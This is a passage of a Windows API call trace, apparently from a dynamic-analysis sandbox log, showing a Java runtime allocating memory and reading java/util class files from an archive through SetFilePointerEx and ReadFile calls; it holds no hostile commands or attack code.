strlen (_Str="java/util/spi/ResourceBundleControlProvider.class") returned 0x31 [0125.487] malloc (_Size=0x48) returned 0x12e60b40 [0125.487] malloc (_Size=0xa0) returned 0x12dab890 [0125.487] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34169cf, lpNewFilePointer=0x208c7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7e0*=54618575) returned 1 [0125.487] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7b0, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208c7b0*=0xa0, lpOverlapped=0x0) returned 1 [0125.487] malloc (_Size=0x32) returned 0x12ef4c90 [0125.488] strlen (_Str="java/util/spi/ResourceBundleControlProvider.class") returned 0x31 [0125.488] strcpy (in: _Dest=0x208c960, _Source="java/util/spi/ResourceBundleControlProvider.class" | out: _Dest="java/util/spi/ResourceBundleControlProvider.class") returned="java/util/spi/ResourceBundleControlProvider.class" [0125.488] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308e8c2, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=50915522) returned 1 [0125.488] ReadFile (in: hFile=0x134, lpBuffer=0x208c430, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x208c430*, lpNumberOfBytesRead=0x208c3b0*=0x1e, lpOverlapped=0x0) returned 1 [0125.488] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308e911, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=50915601) returned 1 [0125.488] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9c0, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x20fe9c0*, lpNumberOfBytesRead=0x208c410*=0x11a, lpOverlapped=0x0) returned 1 [0125.489] free (_Block=0x12ddac20) [0125.489] free (_Block=0x12e5ff10) [0125.491] strlen (_Str="java/util/ServiceLoader.class") returned 0x1d [0125.491] malloc (_Size=0x48) returned 0x12e5ff60 [0125.491] malloc (_Size=0xa0) returned 0x12dac020 [0125.491] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416984, lpNewFilePointer=0x208c520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c520*=54618500) returned 1 [0125.491] ReadFile (in: hFile=0x134, lpBuffer=0x12dac020, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4f0, lpOverlapped=0x0 | out: lpBuffer=0x12dac020*, lpNumberOfBytesRead=0x208c4f0*=0xa0, lpOverlapped=0x0) returned 1 [0125.491] malloc (_Size=0x1e) returned 0x12dda800 [0125.491] strlen (_Str="java/util/ServiceLoader.class") returned 0x1d [0125.491] strcpy (in: _Dest=0x208c6a0, _Source="java/util/ServiceLoader.class" | out: _Dest="java/util/ServiceLoader.class") returned="java/util/ServiceLoader.class" [0125.491] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308cfde, lpNewFilePointer=0x208c120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c120*=50909150) returned 1 [0125.491] ReadFile (in: hFile=0x134, lpBuffer=0x208c170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0f0, lpOverlapped=0x0 | out: lpBuffer=0x208c170*, lpNumberOfBytesRead=0x208c0f0*=0x1e, lpOverlapped=0x0) returned 1 [0125.493] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308d019, lpNewFilePointer=0x208c180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c180*=50909209) returned 1 [0125.493] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x18a9, lpNumberOfBytesRead=0x208c150, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c150*=0x18a9, lpOverlapped=0x0) returned 1 [0125.494] free (_Block=0x12ef4c90) [0125.494] free (_Block=0x12e60b40) [0125.496] malloc (_Size=0x48) returned 0x12e60b40 [0125.496] malloc (_Size=0xa0) returned 0x12dac390 [0125.496] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341692c, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=54618412) returned 1 [0125.496] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208c610*=0xa0, lpOverlapped=0x0) returned 1 [0125.496] malloc (_Size=0x2b) returned 0x12ef4c90 [0125.497] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308bfdf, lpNewFilePointer=0x208c240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c240*=50905055) returned 1 [0125.497] ReadFile (in: hFile=0x134, lpBuffer=0x208c290, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c210, lpOverlapped=0x0 | out: lpBuffer=0x208c290*, lpNumberOfBytesRead=0x208c210*=0x1e, lpOverlapped=0x0) returned 1 [0125.497] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308c027, lpNewFilePointer=0x208c2a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2a0*=50905127) returned 1 [0125.497] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xfb7, lpNumberOfBytesRead=0x208c270, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c270*=0xfb7, lpOverlapped=0x0) returned 1 [0125.499] malloc (_Size=0x48) returned 0x12e5ed90 [0125.499] malloc (_Size=0xa0) returned 0x12daaef0 [0125.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34168df, lpNewFilePointer=0x208c780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c780*=54618335) returned 1 [0125.499] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c750, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c750*=0xa0, lpOverlapped=0x0) returned 1 [0125.499] malloc (_Size=0x20) returned 0x12dda800 [0125.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308ba5a, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=50903642) returned 1 [0125.499] ReadFile (in: hFile=0x134, lpBuffer=0x208c3d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x208c3d0*, lpNumberOfBytesRead=0x208c350*=0x1e, lpOverlapped=0x0) returned 1 [0125.499] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308ba97, lpNewFilePointer=0x208c3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3e0*=50903703) returned 1 [0125.499] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x548, lpNumberOfBytesRead=0x208c3b0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c3b0*=0x548, lpOverlapped=0x0) returned 1 [0125.500] malloc (_Size=0x48) returned 0x12e60b40 [0125.500] malloc (_Size=0xa0) returned 0x12daace0 [0125.500] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34166c9, lpNewFilePointer=0x208c520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c520*=54617801) returned 1 [0125.500] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4f0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c4f0*=0xa0, lpOverlapped=0x0) returned 1 [0125.500] malloc (_Size=0x1e) returned 0x12dda980 [0125.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30899a0, lpNewFilePointer=0x208c120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c120*=50895264) returned 1 [0125.501] ReadFile (in: hFile=0x134, lpBuffer=0x208c170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0f0, lpOverlapped=0x0 | out: lpBuffer=0x208c170*, lpNumberOfBytesRead=0x208c0f0*=0x1e, lpOverlapped=0x0) returned 1 [0125.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30899db, lpNewFilePointer=0x208c180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c180*=50895323) returned 1 [0125.501] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x581, lpNumberOfBytesRead=0x208c150, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c150*=0x581, lpOverlapped=0x0) returned 1 [0125.502] malloc (_Size=0x48) returned 0x12e5f060 [0125.502] malloc (_Size=0xa0) returned 0x12dabc00 [0125.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341667e, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=54617726) returned 1 [0125.502] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208c5b0*=0xa0, lpOverlapped=0x0) returned 1 [0125.502] malloc (_Size=0x1e) returned 0x12ddac50 [0125.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3089672, lpNewFilePointer=0x208c1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1e0*=50894450) returned 1 [0125.503] ReadFile (in: hFile=0x134, lpBuffer=0x208c230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1b0, lpOverlapped=0x0 | out: lpBuffer=0x208c230*, lpNumberOfBytesRead=0x208c1b0*=0x1e, lpOverlapped=0x0) returned 1 [0125.503] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30896ad, lpNewFilePointer=0x208c240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c240*=50894509) returned 1 [0125.503] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2f3, lpNumberOfBytesRead=0x208c210, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c210*=0x2f3, lpOverlapped=0x0) returned 1 [0125.504] malloc (_Size=0x48) returned 0x12e60b40 [0125.504] malloc (_Size=0xa0) returned 0x12dac650 [0125.504] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416633, lpNewFilePointer=0x208c570, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c570*=54617651) returned 1 [0125.504] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c540, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208c540*=0xa0, lpOverlapped=0x0) returned 1 [0125.504] malloc (_Size=0x1e) returned 0x12ddb160 [0125.504] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30890c8, lpNewFilePointer=0x208c170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c170*=50893000) returned 1 [0125.504] ReadFile (in: hFile=0x134, lpBuffer=0x208c1c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c140, lpOverlapped=0x0 | out: lpBuffer=0x208c1c0*, lpNumberOfBytesRead=0x208c140*=0x1e, lpOverlapped=0x0) returned 1 [0125.504] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3089103, lpNewFilePointer=0x208c1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1d0*=50893059) returned 1 [0125.504] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x56f, lpNumberOfBytesRead=0x208c1a0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c1a0*=0x56f, lpOverlapped=0x0) returned 1 [0125.506] malloc (_Size=0x48) returned 0x12e5fce0 [0125.506] malloc (_Size=0xa0) returned 0x12dab520 [0125.506] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34165e6, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=54617574) returned 1 [0125.506] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208c5b0*=0xa0, lpOverlapped=0x0) returned 1 [0125.506] malloc (_Size=0x20) returned 0x12ddaef0 [0125.506] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3088a90, lpNewFilePointer=0x208c1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1e0*=50891408) returned 1 [0125.506] ReadFile (in: hFile=0x134, lpBuffer=0x208c230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1b0, lpOverlapped=0x0 | out: lpBuffer=0x208c230*, lpNumberOfBytesRead=0x208c1b0*=0x1e, lpOverlapped=0x0) returned 1 [0125.506] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3088acd, lpNewFilePointer=0x208c240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c240*=50891469) returned 1 [0125.506] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x5fb, lpNumberOfBytesRead=0x208c210, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c210*=0x5fb, lpOverlapped=0x0) returned 1 [0125.507] malloc (_Size=0x48) returned 0x12e60b40 [0125.507] malloc (_Size=0xa0) returned 0x12dab940 [0125.507] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416596, lpNewFilePointer=0x208c650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c650*=54617494) returned 1 [0125.508] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c620, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208c620*=0xa0, lpOverlapped=0x0) returned 1 [0125.508] malloc (_Size=0x23) returned 0x12ddad70 [0125.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308870f, lpNewFilePointer=0x208c250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c250*=50890511) returned 1 [0125.508] ReadFile (in: hFile=0x134, lpBuffer=0x208c2a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c220, lpOverlapped=0x0 | out: lpBuffer=0x208c2a0*, lpNumberOfBytesRead=0x208c220*=0x1e, lpOverlapped=0x0) returned 1 [0125.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308874f, lpNewFilePointer=0x208c2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2b0*=50890575) returned 1 [0125.508] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x341, lpNumberOfBytesRead=0x208c280, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c280*=0x341, lpOverlapped=0x0) returned 1 [0125.509] malloc (_Size=0x48) returned 0x12e5fd30 [0125.509] malloc (_Size=0xa0) returned 0x12daace0 [0125.509] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416454, lpNewFilePointer=0x208c560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c560*=54617172) returned 1 [0125.509] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c530, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c530*=0xa0, lpOverlapped=0x0) returned 1 [0125.509] malloc (_Size=0x22) returned 0x12ddab00 [0125.510] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3087b39, lpNewFilePointer=0x208c160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c160*=50887481) returned 1 [0125.510] ReadFile (in: hFile=0x134, lpBuffer=0x208c1b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c130, lpOverlapped=0x0 | out: lpBuffer=0x208c1b0*, lpNumberOfBytesRead=0x208c130*=0x1e, lpOverlapped=0x0) returned 1 [0125.510] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3087b78, lpNewFilePointer=0x208c1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1c0*=50887544) returned 1 [0125.510] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x31a, lpNumberOfBytesRead=0x208c190, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c190*=0x31a, lpOverlapped=0x0) returned 1 [0125.511] malloc (_Size=0x48) returned 0x12e60b40 [0125.511] malloc (_Size=0xa0) returned 0x12daaef0 [0125.511] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416349, lpNewFilePointer=0x208d030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d030*=54616905) returned 1 [0125.511] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d000, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208d000*=0xa0, lpOverlapped=0x0) returned 1 [0125.512] malloc (_Size=0x28) returned 0x12dda650 [0125.512] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3086341, lpNewFilePointer=0x208cc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc30*=50881345) returned 1 [0125.512] ReadFile (in: hFile=0x134, lpBuffer=0x208cc80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc00, lpOverlapped=0x0 | out: lpBuffer=0x208cc80*, lpNumberOfBytesRead=0x208cc00*=0x1e, lpOverlapped=0x0) returned 1 [0125.575] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3086386, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=50881414) returned 1 [0125.576] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cc60*=0xe70, lpOverlapped=0x0) returned 1 [0125.578] malloc (_Size=0x48) returned 0x12e5f4c0 [0125.578] malloc (_Size=0xa0) returned 0x12dac9c0 [0125.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34162ed, lpNewFilePointer=0x208cfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfb0*=54616813) returned 1 [0125.578] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf80, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208cf80*=0xa0, lpOverlapped=0x0) returned 1 [0125.578] malloc (_Size=0x2f) returned 0x12ef4c90 [0125.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3085f58, lpNewFilePointer=0x208cbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbb0*=50880344) returned 1 [0125.578] ReadFile (in: hFile=0x134, lpBuffer=0x208cc00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cb80, lpOverlapped=0x0 | out: lpBuffer=0x208cc00*, lpNumberOfBytesRead=0x208cb80*=0x1e, lpOverlapped=0x0) returned 1 [0125.580] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3085fa4, lpNewFilePointer=0x208cc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc10*=50880420) returned 1 [0125.580] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x39d, lpNumberOfBytesRead=0x208cbe0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cbe0*=0x39d, lpOverlapped=0x0) returned 1 [0125.580] malloc (_Size=0x48) returned 0x12e60b40 [0125.580] malloc (_Size=0xa0) returned 0x12dac9c0 [0125.580] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341628f, lpNewFilePointer=0x208c4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4f0*=54616719) returned 1 [0125.581] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4c0, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c4c0*=0xa0, lpOverlapped=0x0) returned 1 [0125.581] malloc (_Size=0x31) returned 0x12ef4cd0 [0125.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3085de3, lpNewFilePointer=0x208c0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0f0*=50879971) returned 1 [0125.581] ReadFile (in: hFile=0x134, lpBuffer=0x208c140, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0c0, lpOverlapped=0x0 | out: lpBuffer=0x208c140*, lpNumberOfBytesRead=0x208c0c0*=0x1e, lpOverlapped=0x0) returned 1 [0125.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3085e31, lpNewFilePointer=0x208c150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c150*=50880049) returned 1 [0125.581] ReadFile (in: hFile=0x134, lpBuffer=0x1227a9e0, nNumberOfBytesToRead=0x127, lpNumberOfBytesRead=0x208c120, lpOverlapped=0x0 | out: lpBuffer=0x1227a9e0*, lpNumberOfBytesRead=0x208c120*=0x127, lpOverlapped=0x0) returned 1 [0125.583] strlen (_Str="java/util/ResourceBundle$SingleFormatControl.class") returned 0x32 [0125.583] malloc (_Size=0x48) returned 0x12e5fba0 [0125.583] malloc (_Size=0xa0) returned 0x12dac390 [0125.583] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341622f, lpNewFilePointer=0x208d020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d020*=54616623) returned 1 [0125.583] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cff0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208cff0*=0xa0, lpOverlapped=0x0) returned 1 [0125.583] malloc (_Size=0x33) returned 0x12ef4c90 [0125.584] strlen (_Str="java/util/ResourceBundle$SingleFormatControl.class") returned 0x32 [0125.584] strcpy (in: _Dest=0x208d1a0, _Source="java/util/ResourceBundle$SingleFormatControl.class" | out: _Dest="java/util/ResourceBundle$SingleFormatControl.class") returned="java/util/ResourceBundle$SingleFormatControl.class" [0125.584] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x308597e, lpNewFilePointer=0x208cc20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc20*=50878846) returned 1 [0125.584] ReadFile (in: hFile=0x134, lpBuffer=0x208cc70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cbf0, lpOverlapped=0x0 | out: lpBuffer=0x208cc70*, lpNumberOfBytesRead=0x208cbf0*=0x1e, lpOverlapped=0x0) returned 1 [0125.584] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30859ce, lpNewFilePointer=0x208cc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc80*=50878926) returned 1 [0125.584] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x415, lpNumberOfBytesRead=0x208cc50, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cc50*=0x415, lpOverlapped=0x0) returned 1 [0125.584] free (_Block=0x12ef4cd0) [0125.585] free (_Block=0x12e60b40) [0125.586] malloc (_Size=0x48) returned 0x12e60b40 [0125.586] malloc (_Size=0xa0) returned 0x12daace0 [0125.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34161e7, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=54616551) returned 1 [0125.586] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ccf0*=0xa0, lpOverlapped=0x0) returned 1 [0125.586] malloc (_Size=0x1b) returned 0x12dda800 [0125.586] strlen (_Str="java/util/LinkedList.class") returned 0x1a [0125.586] strcpy (in: _Dest=0x208cea0, _Source="java/util/LinkedList.class" | out: _Dest="java/util/LinkedList.class") returned="java/util/LinkedList.class" [0125.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30837f0, lpNewFilePointer=0x208c920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c920*=50870256) returned 1 [0125.586] ReadFile (in: hFile=0x134, lpBuffer=0x208c970, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c8f0, lpOverlapped=0x0 | out: lpBuffer=0x208c970*, lpNumberOfBytesRead=0x208c8f0*=0x1e, lpOverlapped=0x0) returned 1 [0125.587] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3083828, lpNewFilePointer=0x208c980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c980*=50870312) returned 1 [0125.587] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2156, lpNumberOfBytesRead=0x208c950, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c950*=0x2156, lpOverlapped=0x0) returned 1 [0125.588] free (_Block=0x12ef4c90) [0125.588] free (_Block=0x12e5fba0) [0125.591] malloc (_Size=0x48) returned 0x12e5f420 [0125.591] malloc (_Size=0xa0) returned 0x12dabf70 [0125.591] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416193, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=54616467) returned 1 [0125.591] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208c2b0*=0xa0, lpOverlapped=0x0) returned 1 [0125.591] malloc (_Size=0x27) returned 0x12dda860 [0125.593] strlen (_Str="java/util/AbstractSequentialList.class") returned 0x26 [0125.593] strcpy (in: _Dest=0x208c460, _Source="java/util/AbstractSequentialList.class" | out: _Dest="java/util/AbstractSequentialList.class") returned="java/util/AbstractSequentialList.class" [0125.593] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30830aa, lpNewFilePointer=0x208bee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bee0*=50868394) returned 1 [0125.593] ReadFile (in: hFile=0x134, lpBuffer=0x208bf30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208beb0, lpOverlapped=0x0 | out: lpBuffer=0x208bf30*, lpNumberOfBytesRead=0x208beb0*=0x1e, lpOverlapped=0x0) returned 1 [0125.593] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30830ee, lpNewFilePointer=0x208bf40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf40*=50868462) returned 1 [0125.593] ReadFile (in: hFile=0x134, lpBuffer=0x1227c790, nNumberOfBytesToRead=0x702, lpNumberOfBytesRead=0x208bf10, lpOverlapped=0x0 | out: lpBuffer=0x1227c790*, lpNumberOfBytesRead=0x208bf10*=0x702, lpOverlapped=0x0) returned 1 [0125.594] free (_Block=0x12dda800) [0125.594] free (_Block=0x12e60b40) [0125.596] malloc (_Size=0x48) returned 0x12e60b40 [0125.596] malloc (_Size=0xa0) returned 0x12dac860 [0125.596] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416146, lpNewFilePointer=0x208cc50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc50*=54616390) returned 1 [0125.596] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc20, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208cc20*=0xa0, lpOverlapped=0x0) returned 1 [0125.596] malloc (_Size=0x20) returned 0x12dda710 [0125.596] strlen (_Str="java/util/LinkedList$Node.class") returned 0x1f [0125.596] strcpy (in: _Dest=0x208cdd0, _Source="java/util/LinkedList$Node.class" | out: _Dest="java/util/LinkedList$Node.class") returned="java/util/LinkedList$Node.class" [0125.596] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3082df5, lpNewFilePointer=0x208c850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c850*=50867701) returned 1 [0125.596] ReadFile (in: hFile=0x134, lpBuffer=0x208c8a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c820, lpOverlapped=0x0 | out: lpBuffer=0x208c8a0*, 